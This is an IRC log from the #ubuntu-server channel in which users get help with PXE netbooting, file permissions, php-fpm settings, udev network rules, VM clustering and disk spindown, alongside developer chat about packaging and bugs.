 * RoyK hasn't had 32bit hardware except for a raspberry pi or other embedded arm things for some time
<marcel__> I did not ask for an opinion I ask for a solution
<rbasak> marcel__: what's pxeserver.cfg? Am I missing something? On Ubuntu Server I'm only aware of pxelinux.cfg and to use Ubuntu to netboot Windows, I imagine you need to do something Windows-specific from dhcpd.conf. ISC dhcpd can certainly differentiate based on things like vendor-specific options in the DHCP request, for example to specify a different "filename", if that helps you.
<RoyK> marcel__: I'd answer if I knew
<marcel__> The problem is that in the remap file you give the location of the windows boot files. But this is done before you get the menu.
<marcel__> But win32 and win64 are different files and can't be placed in the same folder.
<RoyK> marcel__: I beleive we've done that at work with different choices in a menu, but I haven't done it myself
<marcel__> can you figure out how they did it?
<RoyK> marcel__: we're not using that thing anymore - the M$ guys took over and we're only rolling out windows with the M$ things
<RoyK> marcel__: and that was before I even started in this job
<marcel__> I am afraid you can't help me, or have you any suggestion where I can ask this question?
<RoyK> looks so
<sarnold> hrm, asking for windows help in a linux irc channel might not have been the most expediant way to get a solution..
<sarnold> pity he left before I could suggest serverfault.
<RoyK> sarnold: it wasn't asking for windows help, it was asking for how to boot windows from pxe from linux, which is quite ok imho
<sarnold> RoyK: I saw the core of the question as "can win 32 and win 64 pxe boot from a single server".. smells like something that would require heavy windows experience, to me.
<RoyK> sarnold: he was talking about pxe booting windows from a linux box
<RoyK> sarnold: that is - perhaps I misunderstood - but normally windows don't use config files for such stuff
<sarnold> RoyK: you're right that the pxe all happens well before an OS is involved..
<smoser> utlemming, i just opened https://bugs.launchpad.net/ubuntu/+bug/1220366
<uvirtbot> Launchpad bug 1220366 in ubuntu "cloud-images have inconsistent filenames in 12.04.3" [High,Confirmed]
<utlemming> smoser: ack
<freakynl> Hi, since I have a bug open for quite some time and it was apparently not necessary to update user space tools for a newer kernel with 13.04 - what are the chances it's going to be updated with 13.10?
<freakynl> https://bugs.launchpad.net/ubuntu/+source/targetcli/+bug/1111852
<uvirtbot> Launchpad bug 1111852 in targetcli "targetcli bug - buffered fileio mode not saved across reboots" [Medium,Triaged]
<freakynl> It's not only the buffered mode btw, whilst 3.8 supports passwords on the portal as well (instead of just targets), the userland tools to configure it do not (that is, the ones that come with ubuntu do not as they're not updated)
<Vasa> hey can i make a user for FTP usage on the whole server that can read/write all the files in the system however can't execute anything?
<Vasa> so i wouldn't have to use root
<sarnold> Vasa: read more or less implies execute.
<sarnold> Vasa: what problem are you trying to solve?
<Vasa> just want to disable root for security but instead keep a way to edit all the files anyway
<Vasa> thought it would be smart to not let that new user run any scripts at all, just read them/write to them
<Vasa> and access via FTP only
<sarnold> even if the user adds an entry to /etc/crontab that opens a shell on a port?
<Vasa> ohhh well dont have cron anyway
<Vasa> is there a way?
<Vasa> i will take care of blocking what you mentioned
<freakynl> you can not execute over ftp, ftp is ancient and unsafe, use sftp or if you must ftps. Unless you like sending passwords with that much power clear/text over the wire, in which case you definitely want ftp
<sarnold> Vasa: Will you also block writing to /etc/init? or /bin/sh? I fear what you want to do is likely impossible. what is the problem you're trying to solve? there may be a better way to do it..
<Vasa> freakynl please read original  question, it was not my intention i already use sftp my intention was to avoid using ROOT to access the server and make a FTP account in aprallel with access to everything excpect for executing scripts
<Vasa> sarnold just want to avoid using root account yet still have a way to edit all server files
<shauno> by 'all server files', do you mean wwwroot? or the entire filesystem?
<andol> Vasa: How is that really any different, given the examples provided by sarnold?
<RoyK> Vasa: sounds like a jolly bad idea to me, but you can set a root password and use sftp - old style ftp might work if you run the ftpd as root, but it will be entirely madness to open such a hole
<freakynl> That's gonna be hard. Extended ACL's should help, just adding it to the root group will grant too much perm
<Vasa> entire file system because i got various configurations in /etc and got to view logs in /var/log and got most of the files in /home
<Vasa> i use only sftp
<Vasa> ok maybe i don't need this much control
<freakynl> most stuff in /etc, /var/log and /home isn't executable (or better said, nothing in there *should* be executable although there's stuff like ssl-vpn clients that install in ~)
<Vasa> if i give access to a single user to /etc/nginx /etc/php5 /var/log/nginx  AND /home/Websites  it should not ruin the rest of the system right?
<freakynl> have a look at setfacl
<Vasa> i mean with chown
<Vasa> alright thanks everyone i think i know my solution thanks all
<andol> Vasa: I'd be carefull about blatantly using chown on those directory, as there might very well be some file where the daemons in question expect certain filer ownerships.
<Vasa> yes you are right
<Vasa> i will be extremly careful
<sarnold> Vasa: that's significantly better -- I expect it is possible to elevate privilegs from /etc/nginx/ to root, but it'd take slightly more effort and probably be more easily audited. :)
<Vasa> but if in htop i see that the proccess is with user www-data
<Vasa> its safe to make those configs all www-data right?
<Vasa> plus if the proccess starts as ROOT anyway he doesn't care what chown i put
<sarnold> Vasa: you do not want the web server to be able to write anything except its log files, upload directories if any, and database sockets if any.
<Vasa> you got a point i better take care of that
<Vasa> i made the user of nginx the owner of all the websites directory and all files in it
<Vasa> i guess it gives him all he needs to do his evil
<andol> Vasa: Really, this approah of yours really creates more problems than it solves.
<sarnold> and nginx is going to start as root, so it can bind it's socket. if you allow an untrusted user to write its configuration files, it can probably be configured to not drop privileges. BUT, this problem is so much more confined, it's significantly better... :)
<Vasa> alright alright you are right :P
<Vasa> i'll go with that thanks all good luck
<freakynl> Vasa: setfacl is safer
<freakynl> hmm he might be back soon ;)
<jamespage> hallyn_, hey - I just got passed this by one of the ceph rbd devs
<jamespage> http://pastebin.com/ARV5FPGu
<jamespage> it enables logging for librbd in qemu
<jamespage> and allows debugging via admin sockets in /var/run
<jamespage> any chance you can review and add if you feel appropriate
<jamespage> ?
<hallyn_> jdstrand: ^
<hallyn_> jamespage: is anything under /run/ceph supposed to be privileged?
<hallyn_> jamespage: do you mind opening a bug for it with just the contents of the pb)
<hallyn_> (so i can point security team to it :)
<jdstrand> hallyn_: so, /var/log/ceph/* rw and /{,var/}run/ceph/** seems like they should be vm specific? I'm not keen on 'capability mknod,' at all, but I guess it wouldn't be the worst if the process was unprivileged
<jamespage> hallyn_, sure
<jamespage> hallyn_, bug 1220431
<uvirtbot> Launchpad bug 1220431 in libvirt "Updates to apparmor profile for ceph rbd" [Undecided,New] https://launchpad.net/bugs/1220431
<adam_g> jamespage, any known issues with ceph + havana + juju-core?
<SysFailure0x5a> Hello. I'm having an issue with PHP on Ubuntu Server 12.04 that is driving me nuts. I've been at this for two days.
<SysFailure0x5a> I set the memory_limit is php.ini but it's being ignored.
<hallyn_> jamespage: ^ do you have any testcases that use ceph, so that you could confirm whether /run/ceph/** and /var/log/ceph/** can be made per-vm (i.e. it's actually /run/ceph/libvirt-$uuid or something)?
<msafi> Why do I have to use sudo before almost any command? Is this how things should be? It doesn't feel right.
<sarnold> msafi: It Depends. :)
<sarnold> msafi: sometimes people who have over-used sudo find they need to use it all the time to work with files that should not be owned by root, but are anywhere..
<sarnold> s/anywhere/anyway/
<sarnold> msafi: but if you're working on configuring services you will quite often need sudo, because standard users do not have permissions to modify important system configuration files
<msafi> sarnold, even when I'm in directory var/www/ I have to use sudo mkdir <new website>...
<msafi> I'm getting tired of it...
<msafi> Here we go again, git clone <url> permission denied.
<sarnold> msafi: you could change the privileges of that directory to allow your user account to create and modify websites without any effort, but I'd rather be forced to use 'sudo' as a simple check, to make sure I'm thinking. :) hehe.
<msafi> Good point. But I like to learn from mistakes instead of being too careful.
<sarnold> it is a good idea to check your backups work from time to time :)
<msafi> Can I tell ubuntu to execute all of my commands as sudo?
<sarnold> msafi: run 'sudo -s', that'll give you a root shell.
<msafi> I see.
<msafi> "sudo -s" added to my cheat sheet... Thanks!
<SysFailure0x5a>  I'm having an issue with PHP on Ubuntu Server 12.04 that is driving me nuts. I've been at this for two days
<SysFailure0x5a> I set the memory_limit is php.ini but it's being ignored
<sarnold> SysFailure0x5a: in what way is it being ignored?
<SysFailure0x5a> php.info still shows the default value
<SysFailure0x5a> info.php*
<SysFailure0x5a> I.E. I set memory_limit = 256M but php.info shows 128M
<sarnold> SysFailure0x5a: did you restart the server or fastcgi thing that you use for executing php scripts?
<SysFailure0x5a> I can set it to 64M as well and it still shows 128M
<SysFailure0x5a> Yeah, reload, restart, and even server reboot does nothing
<SysFailure0x5a> php-fpm
<SysFailure0x5a> No value works. 16, 32, 64, 96, 256, 512, I even removed/purged and reinstalled php.
<sarnold> SysFailure0x5a: are you confident that you were editing a file used in the php-fpm configuration? perhaps it uses a different php.ini by default?
<patdk-lap> SysFailure0x5a, there are many places to edit that
<patdk-lap> in /etc/php5/fpm/php.ini and also /etc/php5/fpm/pool.d/*
<patdk-lap> I personally perfer to only modify the /etc/php5/fpm/pool.d/* files
<SysFailure0x5a> Yes, I do a mv php.ini under /etc/php5/fpm/php.ini (same location in info.php) and it said config not loaded. Put it back and it said it was loaded.
<SysFailure0x5a> <patdk-lap>
<SysFailure0x5a> The files in pool.d have no mention of memory_limit
<patdk-lap> you sure? cause by default they do
<SysFailure0x5a> What file?
<SysFailure0x5a> I did a cart of each one.
<SysFailure0x5a> cat*
<patdk-lap> heh?
<patdk-lap> cat is not very useful
<SysFailure0x5a> root@liquidio:/etc/php5/fpm/pool.d# ls
<SysFailure0x5a> www.conf
<patdk-lap> grep could be
<SysFailure0x5a> I sitll pipe cats lol
<SysFailure0x5a> bad habbit
 * sarnold arrests SysFailure0x5a for senseless abuse of cat  :)
<patdk-lap> default is, ;php_admin_value[memory_limit] = 32M
<patdk-lap> but commented out
<patdk-lap> that will override anything in php.ini
<SysFailure0x5a> hm
<SysFailure0x5a> crap
<SysFailure0x5a> that must be it
<SysFailure0x5a> I must have over looked it
<patdk-lap> if it is, grep would of found it
<patdk-lap> assuming you did grep, and used grep properly
<SysFailure0x5a> I don't ever remember having an issue with this file. It's worked in the past with ubuntu by just modifying php.ini
<SysFailure0x5a> Thanks!!!
<SysFailure0x5a> Yep, that fixed it.
<patdk-lap> that file by default HAS NOTHING TURNED ON
<patdk-lap> it's all commented out
<patdk-lap> but you use that file to adjust defaults, so you can run many php, with different options
<patdk-lap> like, we use a normal one for webusers
<patdk-lap> but use one with higher timeouts and memory use, for admins
<SysFailure0x5a> I'm the only user on this server, I've never touched that file ...
<SysFailure0x5a> It was uncommented
<a|3x> hi
<a|3x> if im running a web server, would i need to allow non-root read permission on /tmp directory ?
<sarnold> a|3x: that question is kind of all over the place :) hehe
<sarnold> a|3x: (a) /tmp is already by-default world readable
<sarnold> a|3x: (b) I don't imagine any reasonable web server uses /tmp/ for anything it does internally
<sarnold> a|3x: (c) if you're running php scripts or similar that -does- require /tmp/ access, hopefully they create their own directory and restrict access as far as they can
<NickyP> Is it possible to apply guest additions to server under virtualbox? My attempts want x11 to be in play. I don't care about the mouse or display but would like to mount vbox shared folders.
#ubuntu-server 2013-09-04
<sarnold> NickyP: the 'equivs' package may help you there
<NickyP> equivs ?
<sarnold> NickyP: equivs can help you fake up a package to satisfy a dependency
<a|3x> sarnold, cpanel default for sessions is /tmp, seems insecure
<jtv> ng
<pcnerd> Hey all, is there a manifest listing default packages for server distributions?
<sarnold> pity a|3x is gone. I whole hearted agree that cpanel is insecure. just in case anyone wanted my opinion. :)
<maxagaz> hi
<maxagaz> is there a recommended web hosting control panel for ubuntu ?
<maxagaz> kloxo seems to be the best choice but it only works for CentOS 5.9
<sarnold> pcnerd: it doesn't directly answer your question, but ubuntu-dev-tools provides seeded-in-ubuntu, which can tell you which CDs a given package is on.. might be alright for answering smaller questions
<cppCzar> Nvm. OSX shell is just terrible compared to linux
<cppCzar> gotta install homebrew
<pcnerd> sarnold: thanks. I'm actually trying to find the list of manually installed packages so I can document the setup - I can only find the manifest for desktop is my main problem.
<sarnold> pcnerd: ahhh. I wonder if the /var/log/dpkg.log* files would help you figure out what wasn't installed during system install?
<geser> pcnerd: "apt-mark showmanual" lists the packages which apt considers to got manually installed (e.g. not through a dependency)
<jamespage> adam_g, not that I am aware of
<cppCzar> wget is awesome
<Sakrecoer> got disconnected... i hope i didn't miss anything..
<Sakrecoer> i had a hopefull dream where there was a a package similar to usb-creator-common but, LAN-creator-common, allowing you to just inject any readymade ubuntu distro .iso to any PXE capable machine :)
<Sakrecoer_> hmm... seems i got a flacky connection... sorry... i hope i didn't miss any magic answers? :D
<Sakrecoer_> interesting in my case: https://wiki.ubuntu.com/NetbootManagement
<maxagaz> sarnold: not sure to understand what you mean
<maxagaz> sarnold: about web hosting control panel
<maxagaz> is there a better choice than webmin to administrate my server with a web interface ?
<Sakrecoer_> maybe my dream of serial LAN booting all my family memebers computers, is obsolete for todays diskless aka cloud world ? :)
<kalle_> I need some help with a ubuntu server that sometimes resets some tcp connections..
<zetheroo> I made this file "/etc/udev/rules.d/70-persistent-net.rules" read only with "chmod 444" - is it in any way possible that it is still being written to - perhaps on bootup!?
<jpds> zetheroo: Yeah, I think it's generated on boot.
<zetheroo> jpds: I thought it was edited on boot ... not generated ...
<jpds> zetheroo: /etc/init/udev-finish.conf
<zetheroo> I need to be able to ensure that the OS does not fix itself to any MAC Addresses ... otherwise we have networking issues when moving disks from one host to another ...
<jpds> zetheroo: Well, yes. You're suppose to delete the file before you move the disks over.
<zetheroo> Ha - that's not really possible if the host they were in originally dies ...
<jpds> zetheroo: Delete it after you've moved across then.
<zetheroo> yes, that is what I want to avoid!
<jpds> That file exists so your eth0 doesn't become a eth1 the next time you boo.
<jpds> boot*
<zetheroo> I want to be able to put them into the backup host and have them up and running off the bat ... no editing etc ...
<jpds> zetheroo: Yeah, but what are you going to do when your interfaces start renaming themselves?
<jpds> zetheroo: You're going to have even more networking issues then.
<zetheroo> so there is no way to properly do what I need?
<jpds> Instead of just doing a simple 'rm -f /etc/udev/rules.d/70-persistent-net.rules' on first boot.
<jpds> zetheroo: No, because udev needs a way to map your interface names to MAC addresses.
<jpds> Just delete the file when you move the disks across.
<zetheroo> so you have to delete the file and then reboot?
<jpds> Yes.
<jpds> Then it's regenerated with the new MAC addresses.
<zetheroo> hmmm ok
<jpds> Same thing applies for when you clone a VM and the new VM has different MAC addresses.
<zetheroo> well with a VM if I take the image and boot it up with a new xml (new mac address) it seems to not mind it and the networking works fine ... without having to manipulate any files etc ...
<zetheroo> at least a Linux VM
<jpds> zetheroo: Not if you literally cp the installed image and define different XML for it.
<jpds> s/image/system/
<zetheroo> I have had to create a new XML for a VM and never had an issue with networking due to change of mac address ... only issue occurred if there was a software license on the VM which was locked to the mac address ...
<zetheroo> the Linux OS on the VM never booted up and said it could not connect to the network due to a different MAC addres ..
<jpds> Well, in my experience I've had issues with 70-persistent-net.rules on Ubuntu VMs because of the issue you stated above.
<jpds> Anyway.
<zetheroo> So I don't get why it happens with the Host disks being moved ...
<zetheroo> Ah, maybe Debian doesn't do this the same way Ubuntu does?
<zetheroo> most all our Linux VM's are Debian VM;s
<jpds> zetheroo: That's not the experience I've had, and I'm pretty sure Debian uses udev too in the same way.
<zetheroo> hmm ... odd
<jpds> Yep: http://www.ducea.com/2008/09/01/remove-debian-udev-persistent-net-rules/
<jpds> And yes:
<jpds> "I am speaking about situations when you will copy the files from a system and use them to recreate a new system, or when using some virtualization tools and cloning your vm"
<zetheroo> so if I delete (or rename) this file "70-persistent-net.rules" on the current running machines that would allow the disks to be placed into another host without experiencing network issues!?
<andol> zetheroo: Yepp, if you move/clone a virtual disk you will want to remove that file
<zetheroo> well I was referring to physical machines ... not virtual  ...
<jpds> zetheroo: Yes.
<andol> zetheroo: Same thing
<zetheroo> ok yes
<jpds> zetheroo: Do you understand why that file exists though?
<zetheroo> well the file sorta locks the MAC address of a NIC to an interface label that is then used by the user to configure the network - no!?
<zetheroo> jpds:^
<whiteshark> could any1 spare some time to help me getting my PXE server install a full 12.04 on new servers
<whiteshark> google didnt offer any working solution
<whiteshark> on google i read about a casper folder, none of the iso i downloaded have a casper folder
<whiteshark> my problem is that mid pre-install when i need to select a mirror server, it refuses my mounted iso on my http server
<whiteshark> telling me that the release is wrong
<whiteshark> any1 able to help on PXE issues?
<whiteshark> any1 able to help on PXE issues?
<njuergens> maybe the release _is_ wrong? i think the installer is very picky about the versino you boot and the version on CD
<whiteshark> i collected the installer from the iso
<whiteshark> install/netboot folder
<whiteshark> on google i found some explanation telling me that i need an alternate iso, so i did, but still no casper folder on it
<cfhowlett> whiteshark, http://www.ubuntu.com/download/alternative-downloads
<cfhowlett> whiteshark, for the network installer
<whiteshark> i will take a look
<whiteshark> tnx
<whiteshark> nope, i already tried this
<whiteshark> this is the netboot installer
<whiteshark> i manage to boot from pxe, and i manage to start the install, but the installer want to download from internet
<cfhowlett> whiteshark, I've never done PXE but it sounds like something is still pointed at the internet and not your custom source
<Sakrecoer7> hi. i am trying to netboot 12.04 desktop on two PAE capable machines on a LAN without internet. all info i find suggesting to use a local mirror serve earlier ubuntu versions  and suggest that the .iso be mounted on a path accessible with apache2. is this still the case? i have tried every available iso. when using netboot for12.04 the manual mirror selector conplains about wrong kernel version. netbbot 13.04 just wont even bother finding anyt
<whiteshark> i mounted an iso on my webserver an choose my own mirror giving the ip + folder, but the installer refuses it
<whiteshark> sakrecoer7, i have the same issue
<whiteshark> it works till the mirror select option, then it just refuses the mounted iso
<Sakrecoer7> ah... whiteshark :-) so we are 2! lets get this and setup a proper howto afterwards! :-)
<whiteshark> i used this to start with
<whiteshark> https://help.ubuntu.com/community/PXEInstallMultiDistro
<whiteshark> everything works except, the ubuntu
<Sakrecoer7> same here...
<whiteshark> i used 12.04
<whiteshark> and on google u see that some special folder called casper is needed
<Sakrecoer7> i tied both 12.04 and 13.04
<whiteshark> i downloaded like 10 iso's none of them have a casper folder
<Sakrecoer7> yes the documentation is very poor and confusing for netboot
<whiteshark> yes it is.
<whiteshark> i used http for mirror and it doesnt work, nfs for mirror doesnt work either
<Sakrecoer7> whiteshark: will you hang arround today? i have to go afk now but back ~2pm cet
<cfhowlett> outmoded tutorial for 9.04?  try an update    https://help.ubuntu.com/community/DisklessUbuntuHowto
<cfhowlett> http://s205blog.wordpress.com/2012/10/02/ubuntu-12-04-lte-pxe-network-installation-tutorial/
<whiteshark> im in server channel and here
<cfhowlett> http://digitalsanctum.com/2013/03/22/how-to-setup-a-pxe-server-on-ubuntu/
<Sakrecoer7> lets merge experiences and get this straight for future ubuntu heads! :-)
<njuergens> 11.10 still had the casper directory, so that must have changed afterwards
<matzipan> hey guys.... I'm trying to deploy a small vm cluster on 2 quad core machines... what do you recommend? openstack seems to be a bit too complicated for the job
<matzipan> anyne around?
<matzipan> hey guys.... I'm trying to deploy a small vm cluster on 2 quad core machines... what do you recommend? openstack seems to be a bit too complicated for the job
<matzipan> sorry for double message
<whiteshark> cfhowlett i just read the instructions, but this is for the desktop version, and as mentioned there is no casper folder on the server edition iso found in archives
<whiteshark> i have no clue which folder substitute the "casper" folder on the server editions
<whiteshark> i never see the casper folder and content
<jamespage> zul, https://code.launchpad.net/~james-page/neutron/version-depends/+merge/183855
<njuergens> matzipan, cluster and 'small' dont mix well
<zul> i should probably login to launchpad
<njuergens> do you already have storage for a cluster?
<zul> jamespage:  +1
<njuergens> also, is this a HA cluster or what do you expect from a cluster :-)
<patdk-lap> I expect it to have coffee ready for me each day
<whiteshark> does any1 have a pxe server used to install 12.04 ?
<matzipan> njuergens: I might be naive and look for something unatainable with what I have and maybe not know the terms, so this what i wanna do: i have 2 quad core rackmounted servers and I want to decomission some of my old servers and make them as vms on these  new machines. the final result should have vms that share the resources of the 2 servers and migrate between them if it crashes (which i believe is called a vm cluster) ?
<patdk-lap> whiteshark, asking every 15min won't help
<whiteshark> new time new users
<patdk-lap> that still doesn't invalidate what I said
<matzipan> njuergens: after decomissioning the old servers, I might even wanna add them as nodes to this cluster
<whiteshark> didnt hear u giving me any help, so wonder why i should listen to what ur sayin now, if it bothers you, click on the red cross on the right upper corner
<zetheroo> I am trying to setup bonding and bridging on a KVM host server ... the bonding/bridging works on the host fine, but the VM's cannot ping the gateway ...
<patdk-lap> why? a channel ban is simpler
<patdk-lap> there are simple rules to follow on irc
<njuergens> matzipan, so you are using local storage? you need a way to sync the storage between nodes if you want failover
<patdk-lap> if someone can't follow those simple rules, people won't be willing to help you
<patdk-lap> continuing to be a troll, will cause a ban
<whiteshark> yes, like.... dont speak on channel, saying nothing usefull
<matzipan> njuergens: i can easily add a filestore to the setup if needed
<whiteshark> im asking for help, your are the one who is anoying
<matzipan> njuergens: openstack looks a bit of an overkill, and if ever anything breaks seems like it's gonna be really difficult to debug... although maybe jujucan help with that
<whiteshark> so leave me alone, u can also get banned dont forget
<njuergens> matzipan, do you want/need automatic failover?
<patdk-lap> hmm?
<matzipan> njuergens: want yes... although automatic is an option
<njuergens> pacemaker might  work for you, but that too is complex and hard to debug
<njuergens> personally, I like to use libvirt to manage my VMs
<njuergens> if you set it up the right way you can do manual failover quite nice
<matzipan> njuergens: okay then... we might just end up doing that
<njuergens> but you have to set up your storage first, because you need shared or syncronized storage first
<matzipan> is there a monitoring dashboard that plays nice with plain libvirt?
<njuergens> there again a a lot of options, ceph, drbd, sheepdog
<jamespage> zul: recheck on https://code.launchpad.net/~james-page/neutron/version-depends/+merge/183855
<jamespage> I found some more missing versioned depends
<njuergens> or SAN storages from $VENDOR :-)
<matzipan> njuergens: nah, it would probably cost too much... we have our own storage nodes anyway
<njuergens> what kind of storage is that?
<matzipan> njuergens: don't know the exact details but it's a big ugly box with raid hdds in it
<matzipan> network-attached
<matzipan> njuergens: http://nss.cs.ubc.ca/remus/ have you ever used this ?
<matzipan> we might need HA on some of the vms...
<matzipan> *read want not need*
<matzipan> shit... read "we might want HA" not "we might need HA"
<rbasak> smoser: have you backported simplestreams to precise at all yet?
<rbasak> (if not I can stick it in a ppa against precise for testing)
<njuergens> for a real HA cluster you need a lot of stuff, at least 3 nodes (so yo have a real quorum), redundant communication paths, STONITH and so on
<zul> jamespage: +1
<matzipan> njuergens: oh.. okay... if it looks like we have no idea what we're trying to do, it's because we're students :P
<matzipan> njuergens: university radio york station, in the uk... we're trying to virtualize some of our stuff and hopefully learn stuff on the way
<matzipan> njuergens: http://nss.cs.ubc.ca/remus/doc.html doesn't look that difficult to setup...
<matzipan> i might be naive saying that
<njuergens> i have never heard of it, although that doesn't have to mean anything :-)
<matzipan> njuergens: thanks for the help, esspecialy for pointing out what are the right terms for what i'm trying to do
<matzipan> i'm going to give it a go later today... fun fun fun
<jpds> zetheroo: Yep.
<njuergens> good luck with your project :-)
<matzipan> njuergens: thanks
<msafi> What umask should I set to a directory to make sure all newly created files are owned by a www-data group?
<patdk-wk> not possible
<patdk-wk> umask can only control if the group has permissions, not control what group it is
<smoser> rbasak, no ppa, but trunk should build packages. ./tools/build-deb
 * smoser reboots
<kalle_> I need some help with a ubuntu server that sometimes resets some tcp connections..
<msafi> patdk-wk, okay, is it possible to set umask on www-data group to give it access to all newly created files at /var/www?
<patdk-wk> you can't set umask on a group
<patdk-wk> you set umake on programs
<msafi> patdk-wk, okay, can I set umask on the program that creates new files (like Explorer in Windows) so that it gives access to all newly created files to the www-data group?
<rbasak> smoser: before I saw that I tried a simple backport to precise. There are a bunch of dependencies not available in precise: http://paste.ubuntu.com/6062495/
<rbasak> (not all of them - just that apt-get can't resolve all of them)
<smoser> rbasak, hm.. those are all available in cloud archive.
<smoser> but, yeah.
<rbasak> smoser: ah. I'll add the cloud archive then!
<rbasak> Thanks
<smoser> python-requests could/should be not a depends for precise.
<jamespage> zul, github.com changed IP I think
<jamespage> lab no longer has access...
<smoser> the rest we'll have have to think about how to do that right.
<zul> jamespage:  lovely...i didnt want to get anything done today anyways ;)
<smoser> rbasak, maybe just move the python-requests to a recommends ?
<msafi> I have a directory that's created by "git". Now I can't edit that directory with sftpuser. How can I  solve this problem?
<rbasak> smoser: that sounds reasonable.
<msafi> I created the directory using "git clone <url>"
<rbasak> smoser: I think it'd be useful for us to agree on the release and cloud archive entries to use as a primary test/development environment.
<rbasak> I've been using precise to help make sure that I don't accidentally do things that we can't backport later.
<smoser> rbasak, sure. its interesting actually...
 * msafi thinking of giving up on trying to administer his own server. He may have underestimated the scope of this challenge...
<rbasak> But then the catch is that I might do things that break in saucy I guess.
<smoser> because specifically we dont want to depned on that stuff for the 'cloud-tools' pocket that we're targetting
<smoser> we dont want to depend on the openstack stuff.
 * msafi likes having full control over his machine, though...
<smoser> as cloud-tools is not necessarily compatible with precise-<openstack-release> pocket
<smoser> so for precise, i think we say dont depend on that stuff, dont ship the files that use it (that should be easy enough as we dont ship them in python3-sipmlestreams)
<smoser> i guess we could have python-simplestreams-openstack
<smoser> but 1
<smoser> bug 1
<uvirtbot> smoser: Error: Could not parse data returned by Launchpad: HTTP Error 503: Service Unavailable
<smoser> bug 665235
<uvirtbot> Launchpad bug 665235 in cloud-init "grub-legacy-ec2: attaching a volume to maverick instance may boot off it" [Wishlist,Won't fix] https://launchpad.net/bugs/665235
<rbasak> qemu-kvm has been replaced by qemu-system-* now or something, right? If I want to depend on having qemu available with kvm in saucy, what should I depend on?
<jamespage> adam_g, I just landed support for havana/neutron into the quantum-gateway charm
<jamespage> flushed out a few upgrade issues for havana as well - fixes made in neutron packaging branch ready for next upload (hint zul)
<msafi> Okay friends, good bye!
<zul> jamespage:  meaning i should probably upload a new neutron right?
<jamespage> zul, well wait until thurs/friday
<zul> jamespage:  ack
<zul> jamespage:  hmmmm https://review.openstack.org/#/c/40218/
<jamespage> zul, zo/\jreonvderkjnvdf
<jamespage> \o/
<jamespage> new dep right?
<zul> *cry*
<jamespage> but a better dep that nodejs
<rbasak> Do they not have an approval process for new dependencies?
<zul> rbasak:  yeah but im not sure who approved it in this case
<Sakrecoer7> another interesting project for netboot http://www.tcosproject.org/
<Sakrecoer7> but somehow, the hole netboot thing seemed to have stopped at 10.04 ...
<Sakrecoer7> 99% of tutorials for netboot recommend usiong dhcp3-server, which is deprecated in 13.04 ...
<rbasak> zul: could you try and get the process amended, perhaps, to make sure that all downstream distros are explicitly notified at the start of the processes?
<zul> rbasak:  thats a good idea
<rbasak> zul: something for the next ODS-or-whatever-it's-called-now perhaps?
<zul> rbasak:  yep yep
<rbasak> Checklists FTW :)
<baswazz_> hdparm does not spindown my hd's can anyone help me out?
<rbasak> !details | baswazz_
<ubottu> baswazz_: Please give us full details. For example: "I have a problem with ..., I'm running Ubuntu version .... When I try to do ..., I get the following output: ..., but I expected it to do ..."
<baswazz_> ubottu: Ubuntu 12.04.3 LTS, i have a problem with hdparm, my hdd's do not spindown when i enable spindown_time = 24 in /etc/hdparm.conf, after a reboot nothing happen disks stay idle/active. Also when i manually add it to hdparm -S24 /dev/sd[b-g] nothing happen. I tried 60 (5min) 120 (10min) last weekend it did work, i also reinstalled ubuntu but it does not mather.
<ubottu> baswazz_: I am only a bot, please don't think I'm intelligent :)
<baswazz_> i am a little lost how to fix this, google did not present a answer
<baswazz_> i tried to add it to update-rc.d upstart by making a script and put it in /etc/init.d/hdparm chmod +x
<baswazz_> but sinds it does not respond on my manually added cmd's i think this would do nothing to help yet
<baswazz_> AdvancedPM=yes: disabled (255) WriteCache=enabled
<baswazz_> so it could not intefer with apm 254-128
<rbasak> baswazz_: start by verifying that when you ask hdparm to spin down your disk by hand, it actually spins down.
<rbasak> Beyond that, I'm not sure I can offer any additional help. I don't spin down disks on my servers! Perhaps someone else will come along.
<rbasak> smoser: I have simplestreams patches ready to land. How do you want them? A separate MP for each separate little thing seems a bit obtuse.
<smoser> rbasak, i didn't design bzr workflow :)
<rbasak> smoser: git format-patch/send-email output OIK?
<rbasak> OK?
<smoser> you can git-send-email to me if you want.
<rbasak> Awesome. Thanks!
<smoser> rbasak, push your branch somewhere though.
<smoser> push a bzr branch.
<baswazz_> rbasak: yes if i do: hdparm -y /dev/sd[b-g] the disks do spindown, i have test it for a 24 hour and the disks stay stanby when i use hdparm -y /dev/sd[b-g]
<smoser> rbasak, i think you broke --output-format with your --pretty arg.
<rbasak> smoser: it's sort of intentional. I didn't mean for --pretty to be used with --output-format. --pretty is supposed to supercede it. Perhaps I should check and fail if both are used at parsing stage though.
<rbasak> smoser: I don't see how we could make the two work together.
<rbasak> --pretty is useful to see what's going on though.
<rbasak> smoser: anyway that patch isn't important. Feel free to skip it if you think it needs work.
<smoser> right. i dont think they work together. but maybe '--output-format=PRETTY'
<smoser> ?
<rbasak> I guess.
<smoser> rbasak, http://paste.ubuntu.com/6063024/
<Sakrecoer7> haha... the level of confusion regarding netboot is immense...
<patdk-wk> heh? netboot is simple, and I have never used dhcp3 for it
<Sakrecoer7> like this tutorial: https://help.ubuntu.com/community/DisklessUbuntuHowto it's brilliant. very well explained. But it is stated in the beginning: "Diskless Booting simply uses the remote server for storage and still runs all applications on the local client station. This works better if you have full powered PC's to work with, and are working with a large number of clients that would require too much CPU and RAM to run all their applications o
<Sakrecoer7> patdk-wk cheers! how did you do? server version is easy... but desktop? i've been trying for about 2 weeks now...
<patdk-wk> heh? it's all the same
<Sakrecoer7> patdk-wk i havn't been using dhcp3.server either (its replace by isc-dhcpsomething anyways)... i've used bootp, tftpd-hda and apache2... but since it failed everytime, i might try dhcp3..
<patdk-wk> isc-dhcp-server is dhcp3
<Sakrecoer7> i know they are the same, except some conf files that have different location...
<patdk-wk> when I mean I don't use dhcp3, I mean, I don't use isc-dhcp*
<Sakrecoer7> patdk-wk : cool! so what do you use?
<patdk-wk> well, just about everything
 * Sakrecoer7 notes that he ment to say "i know ther are NOT the same etc.." :)
<patdk-wk> technically, isc-dhcp, windows dhcp, dnsmasq, sun dhcp
<patdk-wk> I manage a lot of different networks with different needs
<Sakrecoer7> sweet, would like to hint me on how to do it on a LAN that is striclty ubuntu ?
<Sakrecoer7> preferably 12.04<
<patdk-wk> then you are pretty much limited to isc-dhcp or dnsmasq
<Sakrecoer7> also i need the mirrors to be local... this is where it always fail in my scenario..
<patdk-wk> well, that is harder
<patdk-wk> you need to rewrite the mirrors or do dns replacement
<Sakrecoer7> i can boot, no problem... bit just keeps complaining about kernel versions in the local mirror...
